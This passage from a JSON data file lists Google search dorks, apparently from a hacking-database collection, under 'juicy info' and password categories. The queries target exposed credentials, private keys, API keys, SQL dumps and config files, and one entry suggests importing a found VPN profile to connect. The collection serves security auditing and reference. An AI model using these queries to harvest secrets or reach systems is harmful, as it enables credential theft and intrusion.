intext: \"login.php\"\r\n# Files Containing Juicy Info\r\n# Date: 16/10/2023\r\n# Exploit Avdhut Hadkar"}, {"dork": "site:.com inurl:/signup.aspx", "description": "# Google Dork: site:.com inurl:/signup.aspx\r\n# Files Containing Juicy Info\r\n# Date: 16/10/2023\r\n# Exploit Mayuresh Gadhekar"}, {"dork": "inurl:\"/login.php\" intitle:\"admin\"", "description": "# Google Dork: inurl:\"/login.php\" intitle:\"admin\"\r\n# Files Containing Juicy Info\r\n# Date: 16/10/2023\r\n# Exploit Aashiq Ahamed"}, {"dork": "site:linkedin.com intitle:\"@gmail\"", "description": "# Google Dork: site:linkedin.com intitle:\"@gmail\"\r\n# Files Containing Juicy Info\r\n# Date: 16/10/2023\r\n# Exploit Shiva Medituru"}, {"dork": "\"-- phpMyAdmin SQL Dump\" ext:txt", "description": "# Google Dork: \"-- phpMyAdmin SQL Dump\" ext:txt\r\n# Files Containing Juicy Info\r\n# Date: 18/10/2023\r\n# Exploit Reza Abasi"}, {"dork": "intitle:index.of intext:log site:.bd", "description": "# Google Dork: intitle:index.of intext:log site:.bd\r\n# Files Containing Juicy Info\r\n# Date:18/10/2023\r\n# Exploit Author: Khandaker Mahidul Islam"}, {"dork": "index of /wp-admin.jpg site:bd", "description": "# Google Dork: index of /wp-admin.jpg site:bd\r\n# Files Containing Juicy Info\r\n# Date:19/10/2023\r\n# Exploit Author: Rezwan Ahmed"}, {"dork": "intitle:\"Error log for /LM/\".edu", "description": "# Google Dork : intitle:\"Error log for /LM/\".edu\r\n# Category : Files Containing Juicy Info\r\n# Date : 19/10/2023\r\n# Author : Neyamul Haque"}, {"dork": "Fwd: intitle:\"index of\" \"login\" site:bd", "description": "# Google Dork: intitle:\"index of\" \"login\" site:bd\r\n# Files Containing Juicy Info\r\n# Date:20/10/2023\r\n# Exploit Author: Faridul Hasan"}, {"dork": "Fwd: Google Dork: inurl:login/login-user", "description": "# Google Dork: inurl:login/login-user\r\n# Files Containing Juicy Info\r\n# Date:01/08/2023\r\n# Exploit Author: Faridul Hasan"}, {"dork": "intitle:\"index of\" \"/userlist/\"", "description": "# Google Dork: intitle:\"index of\" \"/userlist/\"\r\n# Files Containing Juicy Info\r\n# Date: 20/10/2023\r\n# Exploit Author: Md.Tariqul Islam Hasanat"}, {"dork": "inurl:\"xslt?PAGE=C_4_0\"", "description": "# Google Dork: inurl:\"xslt?PAGE=C_4_0\"\r\n# Files Containing Juicy Info\r\n# Date: 20/10/2023\r\n# Exploit Reza Abasi"}, {"dork": "intitle:\"index of\" \"about-me\"", "description": "# Google Dork: intitle:\"index of\" \"about-me\"\r\n# Files Containing Juicy Info\r\n# Date: 23/10/2023\r\n# Exploit Safein Sadad"}, {"dork": "\"index of\" \"cloudapp.azure.com\"", "description": "# Google Dork: \"index of\" \"cloudapp.azure.com\"\r\n# Files Containing Juicy Info\r\n# Date: 23/10/2023\r\n# Exploit Sibi Mathew George"}, {"dork": "\"index of\" \"cloudapp.net\"", "description": "# Google Dork: \"index of\" \"cloudapp.net\"\r\n# Files Containing Juicy Info\r\n# Date: 23/10/2023\r\n# Exploit Sibi Mathew George"}, {"dork": "Google Dorks", "description": "# Google Dork: intitle:index.of \"config.inc.php\"\r\n# Files Containing Juicy Info\r\n# Date: 25/10/2023\r\n# Exploit Shubhranshu Gorai"}, {"dork": "site:www.openbugbounty.org intext:\"xss\" intext:\"Unpatched\"", "description": "# Google Dork: site:www.openbugbounty.org intext:\"xss\" intext:\"Unpatched\"\r\n# Files Containing Juicy Info\r\n# Date: 25/10/2023\r\n# Exploit Sachin Gupta"}, {"dork": "site:.co.in intitle:index of /wp-admin", "description": "# Google Dork: site:.co.in intitle:index of /wp-admin\r\n# Files Containing Juicy Info\r\n# Date: 25/10/2023\r\n# Exploit Sachin Gupta"}, {"dork": "intitle:index.of login.js", "description": "# Google Dork: intitle:index.of login.js\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2023\r\n# Exploit Varad Vaidya"}, {"dork": "site:.com intitle:\"index of\" /mobikwike", "description": "# Google Dork: site:.com intitle:\"index of\" /mobikwike\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2023\r\n# Exploit Husain Ahmad"}, {"dork": "Submiting a google dork.", "description": "# Google Dork: site:.com inurl:/pass-aspx.\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2023\r\n# Exploit swara kalsekar"}, {"dork": "New submission", "description": "# Google Dork: inurl: .git\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2023\r\n# Exploit Jai kumar"}, {"dork": "site:.com intitle:\"index of\"/sbi", "description": "# Google Dork: site:.com intitle:\"index of\"/sbi\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2023\r\n# Exploit Husain Ahmad"}, {"dork": "site:.com intitle:\"index of\"/csb", "description": "# Google Dork: site:.com intitle:\"index of\"/csb\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2023\r\n# Exploit Husain Ahmad"}, {"dork": "\"structure\" + ext:sql", "description": "# Google Dork: \"structure\" + ext:sql\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2023\r\n# Exploit chum1ng0"}, {"dork": "intitle:\"index of\" \"/config/prod/\"", "description": "# Google Dork: intitle:\"index of\" \"/config/prod/\"\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2023\r\n# Exploit Suprit Pandurangi"}, {"dork": "Reporting a New Google Dork : intitle: \"index of\" administrator", "description": "# Google Dork: intitle: \"index of\" administrator\r\n# Files Containing Juicy Info\r\n# Date: 31/10/2023\r\n# Exploit Rahul Thakur"}, {"dork": "Reporting a New Google Dork : intitle:\"index of\" mysql inurl:./db/", "description": "# Google Dork: intitle:\"index of\" mysql inurl:./db/\r\n# Files Containing Juicy Info\r\n# Date: 31/10/2023\r\n# Exploit Rahul Thakur"}, {"dork": "Reporting a New Google Dork: intitle:index.of./.database", "description": "# Google Dork: intitle:index.of./.database\r\n# Files Containing Juicy Info\r\n# Date: 31/10/2023\r\n# Exploit Rahul Thakur"}, {"dork": "intext:\"index of\" \"phpinfo\" site:*.in", "description": "# Google Dork: intext:\"index of\" \"phpinfo\" site:*.in\r\n# Files Containing Juicy Info\r\n# Date: 31/10/2023\r\n# Exploit Soriful Islam"}, {"dork": "Fwd: site:.co.in intitle:index of /wp-admin", "description": "# Google Dork: intitle:index of /wp-admin\r\n# Files Containing Juicy Info\r\n# Date: 31/10/2023\r\n# Exploit Sachin Gupta"}, {"dork": "Re: site:www.openbugbounty.org intext:\"xss\" intext:\"Unpatched\"", "description": "# Google Dork: intext:\"xss\" intext:\"Unpatched\"\r\n# Files Containing Juicy Info\r\n# Date: 31/10/2023\r\n# Exploit Sachin Gupta"}, {"dork": "inurl:\"/cgi-bin/home.ha\"", "description": "# Google Dork: inurl:\"/cgi-bin/home.ha\"\r\n# Files Containing Juicy Info\r\n# Date: 31/10/2023\r\n# Exploit: Louise E"}, {"dork": "Open API Keys", "description": "# Google Dork: (\"_API_KEY=\"sk-\")\r\n# Files Containing Juicy Info\r\n# Date: 01/11/2023\r\n# Exploit: Teddy"}, {"dork": "intitle:index of \"main.js\"", "description": "# Google Dork: intitle:index of \"main.js\"\r\n# Files Containing Juicy Info\r\n# Date: 01/11/2023\r\n# Exploit: Riya Gupta"}, {"dork": "Firewall Log Google Dork Submission", "description": "# Google Dork: \"index of\" \"firewall.log\" | \"firewall.logs\"\r\n# Files Containing Juicy Info\r\n# Date: 01/11/2023\r\n# Exploit: NITYA NAND JHA"}, {"dork": "AWS Cloud Hosted Login Pages", "description": "# Google Dork: AWS Cloud Hosted Login Pages\r\n# Files Containing Juicy Info\r\n# Date: 01/11/2023\r\n# Exploit: Prathamesh Kamble"}, {"dork": "intitle:\"Index of /databases\"", "description": "# Google Dork: intitle:\"Index of /databases\"\r\n# Files Containing Juicy Info\r\n# Date: 01/11/2023\r\n# Exploit: Sayed Recover"}, {"dork": "inurl: \"index of\" \"phpstan.neon\"", "description": "# Google Dork: inurl: \"index of\" \"phpstan.neon\"\r\n# Files Containing Juicy Info\r\n# Date: 01/11/2023\r\n# Exploit: Mark Ivan David"}, {"dork": "intitle:\"Index of /_MACOSX\"", "description": "# Google Dork: intitle:\"Index of /_MACOSX\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Kamran Saifullah"}, {"dork": "intitle:\"Index of /vendor/guzzlehttp\"", "description": "# Google Dork: intitle:\"Index of /vendor/guzzlehttp\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Kamran Saifullah"}, {"dork": "intitle:\"Index of /flipbook\"", "description": "# Google Dork: intitle:\"Index of /flipbook\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Kamran Saifullah"}, {"dork": "intitle:\"Index of /app/webroot/img\"", "description": "# Google Dork: intitle:\"Index of /app/webroot/img\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Kamran Saifullah"}, {"dork": "intitle:\"Index of /wp-includes/sitemaps\"", "description": "# Google Dork: intitle:\"Index of /wp-includes/sitemaps\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Kamran Saifullah"}, {"dork": "intitle:\"Index of /biuro\"", "description": "# Google Dork: intitle:\"Index of /biuro\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Kamran Saifullah"}, {"dork": "intitle:\"Index of /node_modules/\"", "description": "# Google Dork: intitle:\"Index of /node_modules/\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Kamran Saifullah"}, {"dork": "intitle:\"Index of /node\"", "description": "# Google Dork: intitle:\"Index of /node\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Kamran Saifullah"}, {"dork": "intitle:\"index of\" \"plesk-stat\"", "description": "# Google Dork: intitle:\"index of\" \"plesk-stat\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Praharsh Kumar Singh"}, {"dork": "Re: New Dork Submission for Google Hacking Database !!", "description": "# Google Dork: \"intitle:index of wp-content/plugins/wp-mail-smtp/\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Ishwar Kumar"}, {"dork": "inurl:/admin.php", "description": "# Google Dork: inurl:/admin.php\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Aashiq Ahamed"}, {"dork": "intext:\"index of wp-content/uploads\"", "description": "# Google Dork: intext:\"index of wp-content/uploads\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Muhammad Abrar"}, {"dork": "intitle:\"index of\" ec2 -aws", "description": "# Google Dork: intitle:\"index of\" ec2 -aws\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Esteban Brenes Segura"}, {"dork": "intitle:\"index of\" graphql-api", "description": "# Google Dork: intitle:\"index of\" graphql-api\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Esteban Brenes Segura"}, {"dork": "Google Docs data breach through dorks", "description": "# Google Dork: site:docs.google.com inurl:spreadsheets/d/ intitle:\"QUERY\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Jowin John Chemban"}, {"dork": "Google Dork: inurl:\"/bitrix/redirect.php?goto=\"", "description": "# Google Dork: inurl:\"/bitrix/redirect.php?goto=\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Kurmasheva Tatiana"}, {"dork": "KCFinder Google Dork", "description": "# Google Dork: intitle:KCFinder: /files inurl:/kcfinder/browse.php\r\n# Files Containing Juicy Info\r\n# Date: 06/11/2023\r\n# Exploit: Hur Vzee"}, {"dork": "Plone installation files", "description": "# Google Dork: intitle:\"Index of\" intext:\"Plone\" AND (\"migration.log\" OR \"error_log\" OR \"error.log\" OR \"z2.log\" OR \"debug.log\" OR \"Unauthorized.png\" OR \"error\" OR \"passwd\" OR \"htpasswd\" OR \".gitignore\" OR \"debug\")\r\n# Files Containing Juicy Info\r\n# Date: 06/11/2023\r\n# Exploit: Nayab Keshodwala"}, {"dork": "Concrete5 CMS files", "description": "# Google Dork: intitle:\"Index of\" inurl:/concrete5/\r\n# Files Containing Juicy Info\r\n# Date: 06/11/2023\r\n# Exploit: Nayab Keshodwala"}, {"dork": "intitle:\"index of\" \"*robots.txt\" site:.edu", "description": "# Google Dork: intitle:\"index of\" \"*robots.txt\" site:.edu\r\n# Files Containing Juicy Info\r\n# Date: 07/11/2023\r\n# Exploit: Safein Sadad"}, {"dork": "inurl:\"/database.json\"", "description": "# Google Dork: inurl:\"/database.json\"\r\n# Files Containing Juicy Info\r\n# Date: 07/11/2023\r\n# Exploit Author: Raouf"}, {"dork": "inurl: edu + site: admin", "description": "# Google Dork: inurl: edu + site: admin\r\n# Files Containing Juicy Info\r\n# Date: 08/11/2023\r\n# Exploit: Anand J Nair"}, {"dork": "intext:\"index of\" \"infophp()\"", "description": "# Google Dork: intext:\"index of\" \"infophp()\"\r\n# Files Containing Juicy Info\r\n# Date: 08/11/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "intitle:\"index of\" \"secret.txt\"", "description": "# Google Dork: intitle:\"index of\" \"secret.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 08/11/2023\r\n# Exploit: Aashiq Ahamed"}, {"dork": "intitle:\"index of\" \"config.php.txt\"", "description": "# Google Dork: intitle:\"index of\" \"config.php.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 08/11/2023\r\n# Exploit: Aashiq Ahamed"}, {"dork": "inurl:adminpanel site:*.* -site:github.com", "description": "# Google Dork: inurl:adminpanel site:*.* -site:github.com\r\n# Files Containing Juicy Info\r\n# Date: 08/11/2023\r\n# Exploit Author: Anas Zakir"}, {"dork": "site:login.*.* | site:portal.*.*", "description": "# Google Dork: site:login.*.* | site:portal.*.*\r\n# Files Containing Juicy Info\r\n# Date: 08/11/2024\r\n# Exploit Author: Anas Zakir"}, {"dork": "intitle:\"index of \" *.js\"", "description": "# Google Dork: intitle:\"index of \" *.js\"\r\n# Files Containing Juicy Info\r\n# Date: 09/11/2023\r\n# Exploit: Jitendra Behera"}, {"dork": "inurl:pastebin \"VISA\"", "description": "# Google Dork: inurl:pastebin \"VISA\"\r\n# Files Containing Juicy Info\r\n# Date: 10/11/2023\r\n# Exploit: Abhishek Patel"}, {"dork": "Google Dork", "description": "# Google Dork: site:.org.in intitle:index of /wp-admin\r\n# Files Containing Juicy Info\r\n# Date: 10/11/2023\r\n# Exploit: Ritik Singh"}, {"dork": "intitle:\"index of\" private", "description": "# Google Dork: intitle:\"index of\" private\r\n# Files Containing Juicy Info\r\n# Date: 10/11/2023\r\n# Exploit: slacker pwns"}, {"dork": "intitle:\"index of\"Eventlog Analyzer", "description": "# Google Dork: intitle:\"index of\"Eventlog Analyzer\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2023\r\n# Exploit: Connect2maviya"}, {"dork": "intitle:\"index of\" \"wp-config.php.old\" | \"wp-config.php.backup\"", "description": "# Google Dork: intitle:\"index of\" \"wp-config.php.old\" | \"wp-config.php.backup\"\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2023\r\n# Exploit: Qais Qais"}, {"dork": "intitle:\"index of\" inurl:/config/", "description": "# Google Dork: intitle:\"index of\" inurl:/config/\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2023\r\n# Exploit: Qais Qais"}, {"dork": "New google dork for bitcoin - Saleh Lardhi", "description": "# Google Dork: \"index of\" \"./\" \"./bitcoin\"\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2023\r\n# Exploit: Saleh Lardhi"}, {"dork": "inurl:signup | inurl:sign-up | inurl:register | inurl:registration", "description": "# Google Dork: inurl:signup | inurl:sign-up | inurl:register | inurl:registration\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2023\r\n# Exploit: Qais Qais"}, {"dork": "site:*.edu.* inurl:globalprotect", "description": "# Google Dork: site:*.edu.* inurl:globalprotect\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2023\r\n# Exploit: Connect2maviya"}, {"dork": "inurl:\"/wp-content/debug.log\"", "description": "# Google Dork: inurl:\"/wp-content/debug.log\"\r\n# Files Containing Juicy Info\r\n# Date: 20/11/2023\r\n# Exploit: Sathish Kishore"}, {"dork": "inurl:\"/wp-includes/user.php\" -site:wordpress.org -site:github.com -site:fossies.org", "description": "# Google Dork: inurl:\"/wp-includes/user.php\" -site:wordpress.org -site:github.com -site:fossies.org\r\n# Files Containing Juicy Info\r\n# Date: 20/11/2023\r\n# Exploit: Sathish Kishore"}, {"dork": "allinurl:\"add_vhost.php?lang=english\"", "description": "# Google Dork: allinurl:\"add_vhost.php?lang=english\"\r\n# Files Containing Juicy Info\r\n# Date: 20/11/2023\r\n# Exploit: Saleh Lardhi"}, {"dork": "New GHDB Submission: Site Backup Index Exposure", "description": "# Google Dork: intitle:\"index of\" \"site backup\"\r\n# Files Containing Juicy Info\r\n# Date: 20/11/2023\r\n# Exploit: Nyambi Blaise"}, {"dork": "filetype:txt CLAVE*.txt OR clave*.txt", "description": "# Google Dork: filetype:txt CLAVE*.txt OR clave*.txt\r\n# Files Containing Juicy Info\r\n# Date: 23/11/2023\r\n# Exploit: Kevin Tupiza"}, {"dork": "intext:\"Reportico\" site:.com OR site:.org OR site:.net OR site:.gov OR site:.edu", "description": "# Google Dork: intext:\"Reportico\" site:.com OR site:.org OR site:.net OR site:.gov OR site:.edu\r\n# Files Containing Juicy Info\r\n# Date: 23/11/2023\r\n# Exploit: Aashiq Ahamed"}, {"dork": "site:*.ac.* intitle:\"index of\" *.ics", "description": "# Google Dork: site:*.ac.* intitle:\"index of\" *.ics\r\n# Files Containing Juicy Info\r\n# Date: 23/11/2023\r\n# Exploit: Connect2maviya"}, {"dork": "site:*.edu.* intitle:\"index of\" *.ics", "description": "# Google Dork: site:*.edu.* intitle:\"index of\" *.ics\r\n# Files Containing Juicy Info\r\n# Date: 23/11/2023\r\n# Exploit: Connect2maviya"}, {"dork": "site:s3.amazonaws.com \"index of /\"", "description": "# Google Dork: site:s3.amazonaws.com \"index of /\"\r\n# Files Containing Juicy Info\r\n# Date: 24/11/2023\r\n# Exploit: Jessar Qais"}, {"dork": "intitle:\"WAMPSERVER Homepage\"", "description": "# Google Dork: intitle:\"WAMPSERVER Homepage\"\r\n# Files Containing Juicy Info\r\n# Date: 27/11/2023\r\n# Exploit Author: Saleh Lardhi"}, {"dork": "inurl: /adminer.php", "description": "# Google Dork: inurl: /adminer.php\r\n# Files Containing Juicy Info\r\n# Date: 27/11/2023\r\n# Exploit: Satyam Singh"}, {"dork": "site:*.com */admin.txt", "description": "# Google Dork: site:*.com */admin.txt\r\n# Files Containing Juicy Info\r\n# Date: 27/11/2023\r\n# Exploit: saurabh kode"}, {"dork": "intext:\"index of\" \"pins\" site:*.com", "description": "# Google Dork: intext:\"index of\" \"pins\" site:*.com\r\n# Files Containing Juicy Info\r\n# Date: 27/11/2023\r\n# Exploit: Omkar Chavan"}, {"dork": "intitle:index.of /logs.txt", "description": "# Google Dork: intitle:index.of /logs.txt\r\n# Files Containing Juicy Info\r\n# Date: 27/11/2023\r\n# Exploit: saurabh kode"}, {"dork": "filetype:log intext:\"Account Number\"", "description": "# Google Dork: filetype:log intext:\"Account Number\"\r\n# Files Containing Juicy Info\r\n# Date: 29/11/2023\r\n# Exploit: Noor Alhomeed"}, {"dork": "Submission of New Google Dork", "description": "# Google Dork: intitle:\"Index of\" inurl:apache2.conf\r\n# Files Containing Juicy Info\r\n# Date: 30/11/2023\r\n# Exploit: shar0548"}, {"dork": "site:.edu intext:\"robotics\" inurl:/research", "description": "# Google Dork: site:.edu intext:\"robotics\" inurl:/research\r\n# Files Containing Juicy Info\r\n# Date: 30/11/2023\r\n# Exploit: Chunfeng Huang"}, {"dork": "inurl:.\"install.appcenter.ms/orgs/\"", "description": "# Google Dork: inurl:.\"install.appcenter.ms/orgs/\"\r\n# Files Containing Juicy Info\r\n# Date: 30/11/2023\r\n# Exploit: Kamran Saifullah"}, {"dork": "inurl:typo3/index.php", "description": "# Google Dork: inurl:typo3/index.php\r\n# Files Containing Juicy Info\r\n# Date: 30/11/2023\r\n# Exploit: Appsec Jay"}, {"dork": "site:*.ac.* filetype:template", "description": "# Google Dork: site:*.ac.* filetype:template\r\n# Files Containing Juicy Info\r\n# Date: 30/11/2023\r\n# Exploit: Connect2maviya"}, {"dork": "site:*.edu.* filetype:template", "description": "# Google Dork: site:*.edu.* filetype:template\r\n# Files Containing Juicy Info\r\n# Date: 30/11/2023\r\n# Exploit: Connect2maviya"}, {"dork": "intitle:\"index of\" \"configuration.php\"", "description": "# Google Dork: intitle:\"index of\" \"configuration.php\"\r\n# Files Containing Juicy Info\r\n# Date: 01/12/2023\r\n# Exploit: saurabh kode"}, {"dork": "intext:\"index of\" server.conf", "description": "# Google Dork: intext:\"index of\" server.conf\r\n# Files Containing Juicy Info\r\n# Date: 04/12/2023\r\n# Exploit: saurabh kode"}, {"dork": "site:*.* inurl:php_error.log - Sensitive information disclosure", "description": "# Google Dork: site:*.* inurl:php_error.log - Sensitive information disclosure\r\n# Files Containing Juicy Info\r\n# Date: 04/12/2023\r\n# Exploit: Shiva Medituru"}, {"dork": "site:*.*.* intitle:\"index of\" *.pcapng", "description": "# Google Dork: site:*.*.* intitle:\"index of\" *.pcapng\r\n# Files Containing Juicy Info\r\n# Date: 04/12/2023\r\n# Exploit: Connect2maviya"}, {"dork": "inurl:/HappyAxis.jsp", "description": "# Google Dork: inurl:/HappyAxis.jsp\r\n# Files Containing Juicy Info\r\n# Date: 06/12/2023\r\n# Exploit: Aashiq Ahamed"}, {"dork": "intext:\"index of\"store", "description": "# Google Dork: intext:\"index of\"store\r\n# Files Containing Juicy Info\r\n# Date: 06/12/2023\r\n# Exploit: saurabh kode"}, {"dork": "intitle:index of db.py", "description": "# Google Dork: intitle:index of db.py\r\n# Files Containing Juicy Info\r\n# Date: 11/12/2023\r\n# Exploit: Amit Adhikari"}, {"dork": "intext:\"index of\" app", "description": "# Google Dork: intext:\"index of\" app\r\n# Files Containing Juicy Info\r\n# Date: 11/12/2023\r\n# Exploit: Amit Adhikari"}, {"dork": "site:id filetype:sql", "description": "# Google Dork: site:id filetype:sql\r\n# Files Containing Juicy Info\r\n# Date: 11/12/2023\r\n# Exploit: Bambang Sutrisna"}, {"dork": "intext:\"administrator\" filetype:txt intext:\"account\" inurl:/admin , intext:\"administrator\" filetype:txt intext:\"account\" allinurl:", "description": "# Google Dork: intext:\"administrator\" filetype:txt intext:\"account\" inurl:/admin , intext:\"administrator\" filetype:txt intext:\"account\" allinurl:\r\n# Files Containing Juicy Info\r\n# Date: 11/12/2023\r\n# Exploit: Skidrow"}, {"dork": "intitle:\"phpinfo\" site:*.com.* intext:\"HTTP_HOST\"", "description": "# Google Dork: intitle:\"phpinfo\" site:*.com.* intext:\"HTTP_HOST\"\r\n# Files Containing Juicy Info\r\n# Date: 11/12/2023\r\n# Exploit: J. Daniel Elias Valdez"}, {"dork": "GHDB submissions -1", "description": "# Google Dork: intitle: \"/userfiles'\"\"\r\n# Files Containing Juicy Info\r\n# Date: 12/12/2023\r\n# Exploit: Ajay Naik"}, {"dork": "intitle:\"Index of\" intext:\"config\" site:*.com.*", "description": "#Google Dork:intitle:\"Index of\" intext:\"config\" site:*.com.*\r\n#Files Containing Juicy Info\r\n#Date: 12/12/2023\r\n#Exploit Daniel E.V."}, {"dork": "intext:\"userfiles\" intitle:\"Index Of\" site:*.com.*", "description": "#Google Dork:intext:\"userfiles\" intitle:\"Index Of\" site:*.com.*\r\n#Files Containing Juicy Info\r\n#Date: 14/12/2023\r\n#Exploit Daniel E.V."}, {"dork": "intitle:\"Index of\" intext:\"php\" site:*.com.*", "description": "# Google Dork: intitle:\"Index of\" intext:\"php\" site:*.com.*\r\n# Files Containing Juicy Info\r\n# Date: 14/12/2023\r\n# Exploit: saurabh kode"}, {"dork": "Google dorks", "description": "# Google Dork: site:\"*.edu\" intitle:\"index of\"|\"*.json\"\r\n# Files Containing Juicy Info\r\n# Date: 15/12/2023\r\n# Exploit: Abdulmalik Alharbi"}, {"dork": "Google Dork", "description": "# Google Dork: inurl index.php id= site.bd\r\n# Files Containing Juicy Info\r\n# Date: 18/12/2023\r\n# Exploit: Abdulkarim Alsabilah"}, {"dork": "site:.com \"index of docker\"", "description": "# Google Dork: site:.com \"index of docker\"\r\n# Files Containing Juicy Info\r\n# Date: 21/12/2023\r\n# Exploit: Bambang Sutrisna"}, {"dork": "intext:\"user\" filetype:php intext:\"account\" inurl:/admin", "description": "# Google Dork: intext:\"user\" filetype:php intext:\"account\" inurl:/admin\r\n# Files Containing Juicy Info\r\n# Date: 21/12/2023\r\n# Exploit: saurabh kode"}, {"dork": "inurl:\"?url=http\"", "description": "# Google Dork:inurl:\"?url=http\"\r\n# Files Containing Juicy Info\r\n# Date: 21/12/2023\r\n# Exploit: Jeel Patel"}, {"dork": "intitle:\"Fleet Management Portal\"", "description": "# Google Dork: intitle:\"Fleet Management Portal\"\r\n# Files Containing Juicy Info\r\n# Date: 21/12/2023\r\n# Exploit Kamran Saifullah"}, {"dork": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "description": "# Google Dork: inurl:/.well-known/ai-plugin.json\r\n# Files Containing Juicy Info\r\n# Date: 30/11/2023\r\n# Exploit: Mohamed Choukrate"}, {"dork": "(site:jsonformatter.org | site:codebeautify.org) & (intext:aws | intext:bucket | intext:password | intext:secret | intext:username)", "description": "# Google Dork: (site:jsonformatter.org | site:codebeautify.org) &\r\n(intext:aws | intext:bucket | intext:password | intext:secret |\r\nintext:username)\r\n# Files Containing Juicy Info\r\n# Date: 03/01/2024\r\n# Exploit: letmewin"}, {"dork": "ext:java intext:\"executeUpdate\"", "description": "# Exploit Title: Sensitive data in java files\r\n# Google Dork: ext:java intext:\"executeUpdate\"\r\n# Exploit Author: BULLETMHS"}, {"dork": "\"Started by upstream project\" ext:txt", "description": "Author: nadirb19\r\nGoogle Dork: \"Started by upstream project\" ext:txt"}, {"dork": "intitle:\"index of\" env.cgi", "description": "Simple Dork that displays the env file which contains env\r\nvariables, usually juicy stuff and a lot of information disclosure.\r\n\r\n*intitle:\"index of\" env.cgi*"}, {"dork": "inurl:* \"encryption.txt\"", "description": "Google dork: inurl:* \"encryption.txt\""}, {"dork": "intext:\"index of\" web", "description": "# Google Dork:intitle: intext:\"index of\" web\r\n# Files Containing Juicy Info\r\n# Date: 16/02/2024\r\n# Exploit: A.K.M. Mohiuddin"}, {"dork": "inurl:* \"auditing.txt\"", "description": "# Google Dork: inurl:* \"auditing.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 16/02/2024\r\n# Exploit: Gautam Rawat"}, {"dork": "intitle:\"index of\" cgi.pl", "description": "# Google Dork: intitle:\"index of\" cgi.pl\r\n# Files Containing Juicy Info\r\n# Date: 16/02/2024\r\n# Exploit: Gautam Rawat"}], "Files Containing Passwords": [{"dork": "intitle:index.of people.lst", "description": "*sigh*"}, {"dork": "inurl:passlist.txt", "description": "Cleartext passwords. No decryption required!"}, {"dork": "intitle:\"index of\" intext:globals.inc", "description": "contains plaintext user/pass for mysql database"}, {"dork": "filetype:reg reg +intext:\"defaultusername\" +intext:\"defaultpassword\"", "description": "These pages display windows registry keys which reveal passwords and/or usernames."}, {"dork": "filetype:url +inurl:\"ftp://\" +inurl:\"@\"", "description": "These are FTP Bookmarks, some of which contain plaintext login names and passwords."}, {"dork": "filetype:pem intext:private", "description": "This search will find private key files... Private key files are supposed to be, well... private."}, {"dork": "inurl:\"wvdial.conf\" intext:\"password\"", "description": "The wvdial.conf is used for dialup connections.it contains phone numbers, usernames and passwords in cleartext."}, {"dork": "inurl:\"slapd.conf\" intext:\"credentials\" -manpage -\"Manual Page\" -man: -sample", "description": "slapd.conf is the configuration file for slapd, the opensource LDAP deamon. The key \"credentinals\" contains passwords in cleartext."}, {"dork": "inurl:\"slapd.conf\" intext:\"rootpw\" -manpage -\"Manual Page\" -man: -sample", "description": "slapd.conf is the configuration file for slapd, the opensource LDAP deamon. You can view a cleartext or crypted password for the \"rootdn\"."}, {"dork": "filetype:netrc password", "description": "The .netrc file is used for automatic login to servers. The passwords are stored in cleartext."}, {"dork": "ext:pwd inurl:(service | authors | administrators | users) \"# -FrontPage-\"", "description": "Frontpage.. very nice clean search results listing !!No further comments required..changelog:22 jan 2005: improved by vs1400 !"}, {"dork": "filetype:ini ServUDaemon", "description": "The servU FTP Daemon ini file contains setting and session information including usernames, passwords and more."}, {"dork": "filetype:sql (\"values * MD5\" | \"values * password\" | \"values * encrypt\")", "description": "Locate insert statements making use of some builtin function to encrypt a password. PASSWORD(), ENCRYPT() and MD5() are searched."}, {"dork": "!Host=*.* intext:enc_UserPassword=* ext:pcf", "description": "some people actually keep their VPN profiles on the internet...omg... Simply donwload the pcf file, import it in your Cisco VPN client and try to connect"}, {"dork": "inurl:server.cfg rcon password", "description": "Counter strike rcon passwords, saved in the server.cfg."}, {"dork": "intitle:\"phpinfo()\" +\"mysql.default_password\" +\"Zend Scripting Language Engine\"", "description": "This will look throught default phpinfo pages for ones that have a default mysql password."}, {"dork": "ext:inc \"pwd=\" \"UID=\"", "description": "Database connection strings including passwords"}, {"dork": "intitle:rapidshare intext:login", "description": "Rapidshare login passwords."}, {"dork": "server-dbs \"intitle:index of\"", "description": "Yes, people actually post their teamspeak servers on websites. Just look for the words superadmin in the files and the password trails it in plain text."}, {"dork": "ext:asa | ext:bak intext:uid intext:pwd -\"uid..pwd\" database | server | dsn", "description": "search for 